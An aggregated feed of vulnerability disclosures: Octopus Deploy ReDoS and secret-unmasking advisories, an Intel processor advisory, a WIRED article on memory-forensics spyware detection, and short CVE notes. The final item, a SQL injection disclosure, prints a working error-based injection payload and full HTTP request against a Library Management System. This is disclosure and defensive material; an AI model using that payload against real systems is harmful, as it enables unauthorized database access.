Kiosk breakout (without quit password) in Safe Exam Browser (Windows) <3.4.0, which allows an attacker to achieve code execution via the browsers' print dialog.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-36220: Kiosk escape (vulnerability disclosure) · Issue #434 · SafeExamBrowser/seb-win-refactoring

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service targeting the build information request validation.

Summary

ReDoS in Build Information request (CVE-2022-2075)

Advisory Number

2022-12

Discovery Date

06 Jun 2022

Patch Release Date

21 Jun 2022

Advisory Release Date

19 Aug 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-2075

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.6872 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a Medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service targeting the build information request validation. When performed successfully, this results in Octopus Server becoming unresponsive due to excessive CPU usage.

The versions of Octopus Server affected by this vulnerability are:

*   All 0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x versions
*   All 2018.x, 2019.x, 2020.x, 2021.x versions
*   All 2022.1.x versions before 2022.1.2894
*   All 2022.2.x versions before 2022.2.6872
*   All 2022.3.x versions before 2022.3.4953

As of the 19/08/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.2894
*   2022.2.6872
*   2022.3.4953

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.6872). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.6872):**

If you have feature version...

...then upgrade to this version

0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x

2022.1.2894 or greater

2018.x, 2019.x, 2020.x, 2021.x

2022.1.2894 or greater

2022.1.x

2022.1.2894 or greater

2022.2.x

2022.2.6872 or greater

2022.3.x

2022.3.4953 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2075, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-2075: Security Advisory 2022-12

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service using the Variable Project Template.

Summary

ReDoS in Variable Project Templates (CVE-2022-2074)

Advisory Number

2022-11

Discovery Date

12 Jun 2022

Patch Release Date

21 Jun 2022

Advisory Release Date

19 Aug 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

High

CVE ID

CVE-2022-2074

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.6872 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a high rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service using the Variable Project Template.. When performed successfully, this results in Octopus Server becoming unresponsive due to excessive CPU usage.

The versions of Octopus Server affected by this vulnerability are:

*   All 0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x versions
*   All 2018.x, 2019.x, 2020.x, 2021.x versions
*   All 2022.1.x versions before 2022.1.2894
*   All 2022.2.x versions before 2022.2.6872
*   All 2022.3.x versions before 2022.3.4953

As of the 19/08/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.2894
*   2022.2.6872
*   2022.3.4953

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.6872). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.6872):**

If you have feature version...

...then upgrade to this version

0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x

2022.1.2894 or greater

2018.x, 2019.x, 2020.x, 2021.x

2022.1.2894 or greater

2022.1.x

2022.1.2894 or greater

2022.2.x

2022.2.6872 or greater

2022.3.x

2022.3.4953 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2074, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-2074: Security Advisory 2022-11

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service via the package upload function.

Summary

ReDoS in Package Upload Files (CVE-2022-2049)

Advisory Number

2022-10

Discovery Date

02 Jun 2022

Patch Release Date

21 Jun 2022

Advisory Release Date

19 Aug 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-2049

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.6872 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service via the package upload function. When performed successfully, this results in Octopus Server becoming unresponsive due to excessive CPU usage.

The versions of Octopus Server affected by this vulnerability are:

*   All 0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x versions
*   All 2018.x, 2019.x, 2020.x, 2021.x versions
*   All 2022.1.x versions before 2022.1.2894
*   All 2022.2.x versions before 2022.2.6872
*   All 2022.3.x versions before 2022.3.4953

As of the 19/08/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.2894
*   2022.2.6872
*   2022.3.4953

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.6872). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.6872):**

If you have feature version...

...then upgrade to this version

0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x

2022.1.2894 or greater

2018.x, 2019.x, 2020.x, 2021.x

2022.1.2894 or greater

2022.1.x

2022.1.2894 or greater

2022.2.x

2022.2.6872 or greater

2022.3.x

2022.3.4953 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2049, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-2049: Security Advisory 2022-10

In affected versions of Octopus Deploy it is possible to unmask sensitive variables by using variable preview.

Summary

Sensitive variable value displayed in Variable Preview (CVE-2022-1901)

Advisory Number

2022-09

Discovery Date

26 May 2022

Patch Release Date

11 Jul 2022

Advisory Release Date

19 Aug 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-1901

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.7244 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to unmask sensitive variables by using variable preview.

The versions of Octopus Server affected by this vulnerability are:

*   All 2019.x versions after 2019.7.3
*   All 2020.x and 2021.x versions
*   All 2022.1.x versions before 2022.1.3009
*   All 2022.2.x versions before 2022.2.7244
*   All 2022.3.x versions before 2022.3.4953

As of the 19/08/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.3009
*   2022.2.7244
*   2022.3.4953

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.7239). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.7239):**

If you have feature version...

...then upgrade to this version

2019.x versions after 2019.7.3

2022.1.2849 or greater

2020.x, 2021.x

2022.1.2849 or greater

2022.1.x

2022.1.2849 or greater

2022.2.x

2022.2.6729 or greater

2022.3.x

2023.3.2387 or greater

**Mitigation**

This vulnerability can be mitigated by removing the VariableEdit permission from roles that do not require the ability to edit Variables. The permissions cannot cross scope into other projects or environments (test permissions cant unmask prod variables).

We have reviewed the default user roles and determined that the following roles have VariableEdit (and VariableView) permission.

*   Project Contributor
*   Project Deployer
*   Project Lead
*   Runbook Producer
*   Space Manager

The following role also has the VariableView permission. While this permission won't allow the unmasking of secret variables, it will allow the users with this role the ability to see variables that have been unmasked.

*   Runbook Consumer

The above roles can be modified by clearing the checkbox for the VariableEdit permission in the space permissions page of the role.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was identified by a customer

CVE-2022-1901: Security Advisory 2022-09

Printix Cloud Print Management v1.3.1149.0 for Windows was discovered to contain insecure permissions.

CVE-2022-35167

This invasive malware isn’t just for phones—it can target your PC, too. But a new batch of algorithms aims to weed out this threat.

The surveillance-for-hire industry's powerful mobile spyware tools have gotten increasing attention lately as tech companies and governments grapple with the scale of the threat. But spyware that targets laptops and desktop PCs is extremely common in an array of cyberattacks, from state-backed espionage to financially motivated scams. Due to this growing threat, researchers from the incident response firm Volexity and Louisiana State University presented at the Black Hat security conference in Las Vegas last week new and refined tools that practitioners can use to catch more PC spyware in Windows 10, macOS 12, and Linux computers.

Widely used PC spyware—the type that often keylogs targets, tracks the movement of their mouse and clicks, listens in through a computer's microphone, and pulls still photos or video from the camera—can be difficult to detect because attackers intentionally design it to leave a minimal footprint. Rather than installing itself on a target's hard drive like a regular application, the malware (or its most important components) exists and runs only in the target computer's memory or RAM. This means that it doesn't generate certain classic red flags, doesn't show up in regular logs, and gets wiped away when a device is restarted. 

Enter the field of “memory forensics,” which is geared precisely toward developing techniques to assess what's going on in this liminal space. At Black Hat, the researchers specifically announced new detection algorithms based on their findings for the open source memory forensics framework Volatility. 

“Memory forensics was very different five or six years ago as far as how it was being used in the field both for incident response and by law enforcement,” Volexity director Andrew Case tells WIRED. (Case is also a lead developer of Volatility.) “It’s gotten to the point where even outside really intense malware investigations, memory forensics is needed. But for evidence or artifacts from a memory sample to be used in court or some type of legal proceeding, we need to know that the tools are working as expected and that the algorithms are validated. This latest stuff for Black Hat is really some hardcore new techniques as part of our effort to build out verified frameworks."

Case emphasizes that expanded spyware detection tools are needed because Volexity and other security firms regularly see real examples of hackers deploying memory-only spyware in their attacks. At the end of July, for example, Microsoft and the security firm RiskIQ published detailed findings and mitigations to counter the Subzero malware from an Austrian commercial spyware company, DSIRF.

“Observed victims \[targeted with Subzero\] to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama,” Microsoft and RiskIQ wrote. Subzero’s main payload, they added, “resides exclusively in memory to evade detection. It contains a variety of capabilities including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins.”

The researchers particularly focused on honing their detections for how the different operating systems talk to “hardware devices” or sensors and components like the keyboard and camera. By monitoring how the different parts of the system run and communicate with each other and looking for new behaviors or connections, memory forensic algorithms can catch and analyze more potentially malicious activity. One potential tell, for example, is to monitor an operating system process that’s always running, say the feature that lets users log in to a system, and to flag it if additional code gets injected into that process after it starts running. If code was introduced later it could be a sign of malicious manipulation.

“If you work in the incident response field, you likely see this malware all the time,” Case said during his Black Hat talk last week. “We see this targeted at our clients on a daily basis. And if you read the reports from other security vendors, it’s pretty much universal that when you have a motivated threat group targeting an organization—whether that’s a research group inside the organization, whether it’s executives, whether it’s down to just an individual person—the malware that gets deployed on those machines are going to leverage access to hardware devices for truly sensitive information.”

To do forensic analysis of what's happening in a device's memory at a given time, researchers dump the memory into a sort of snapshot file of everything that was in there at that moment. If your laptop has 16 GB of RAM and the memory is full, you'll pull out a 16-GB file from it. But to detect attacks in real time, organizations need to set up forensic monitoring on their devices in advance. And not all operating systems make it easy to conduct such monitoring.

Apple, in particular, is known for locking down access to macOS and iOS to minimize system visibility. The company says it takes this approach as a security measure because, in its estimation, users shouldn't need that level of access to operate within the tightly controlled Apple ecosystem. But the stance has been controversial for a number of reasons and has created tension with some security advocates, who say that when exploitable vulnerabilities do inevitably crop up in Apple's software, particularly iOS, the approach gives the hackers an advantage because defenders have more limited insight and control. 

“It can make exploitation harder, and it can make gaining malware persistence on a system harder,” Case says. “But it also makes forensics harder, so the argument goes both ways.” 

The team was able to make progress on developing detection tools for all three major desktop operating systems, though. And Case emphasizes that the goal is simply to detect as much spyware as possible wherever it can be done as the malware proliferates more and more.

“We work with a ton of very targeted organizations around the world and in the US, and it's organizations themselves being targeted. But also, many times, it’s individuals within the organization or within a political movement—these are the people who get targeted with this type of malware,” he says. “So the further we get on this research and the better our forensic tools are, the more we can find this behavior and make it harder for attackers to get into an environment, stay there, and get to data they want.”

Spyware Hunters Are Expanding Their Toolset

Unsafe Parsing of a PNG tRNS chunk in FastStone Image Viewer through 7.5 results in a stack buffer overflow.

CVE-2022-36947: FastStone Image Viewer - Powerful and Intuitive Photo Viewer, Editor and Batch Converter

Improper isolation of shared resources in some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2022.2 IPU - Intel® Processor Advisory**

**Summary: **

A potential security vulnerability in some Intel® Processors may allow information disclosure.  Intel is releasing firmware updates to address this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-21233

Description: Improper isolation of shared resources in some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

**Affected Products:**

Consult this list of affected products here.

**Recommendations:**

Intel recommends that users of affected Intel® Processors update to the latest version firmware provided by the system manufacturer that addresses these issues.  In addition, Intel will be releasing Intel® SGX SDK updates soon after public embargo is lifted.

Intel has released microcode updates for the affected Intel® Processors that are currently supported on the public github repository. Please see details below on access to the microcode: 

GitHub\*: Public Github: https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files

For Intel® SGX customers, please note there is a known sighting that affects the patch installation recommendation for 3rd Generation Intel® Xeon® Scalable Processors, Codename Icelake-SP, further details and a workaround are available here.

Intel® SGX SDK Download Links:  

*   Intel SGX SDK for Windows v2.16.101.1 and later have the mitigations:  
    https://registrationcenter.intel.com/en/products/download/3407/
*   Intel SGX SDK for Linux v2.17.101.1 and later have the mitigations:  
    https://01.org/intel-software-guard-extensions/downloads

Intel SGX TCB Recovery Plans:  

Further details around the planned Intel SGX TCB recovery can be found here.  

Refer to Intel SGX Attestation Technical Details for more information on the Intel SGX TCB recovery process.

Further TCB Recovery Guidance for developers is available.

**Acknowledgements:**

Intel would like to thank Pietro Borrello from Sapienza University of Rome, Andreas Kogler, Martin Schwarzl, Daniel Gruss from Graz University of Technology, Michael Schwarz from CISPA Helmholtz Center for Information Security and Moritz Lipp from Amazon Web Services for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

08/09/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-21233: INTEL-SA-00657

Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the M_Id parameter at /librarian/del.php.

Permalink

Cannot retrieve contributors at this time

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/librarian/dele.php

Vulnerability location: /LMS/librarian/del.php, M\_Id

\[+\] Payload: delete=&M\_Id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> M\_Id

POST /LMS/librarian/del.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=7v8p4p3goshl3b4fkncu3bh9ui
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
delete=&M\_Id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

Tag

#windows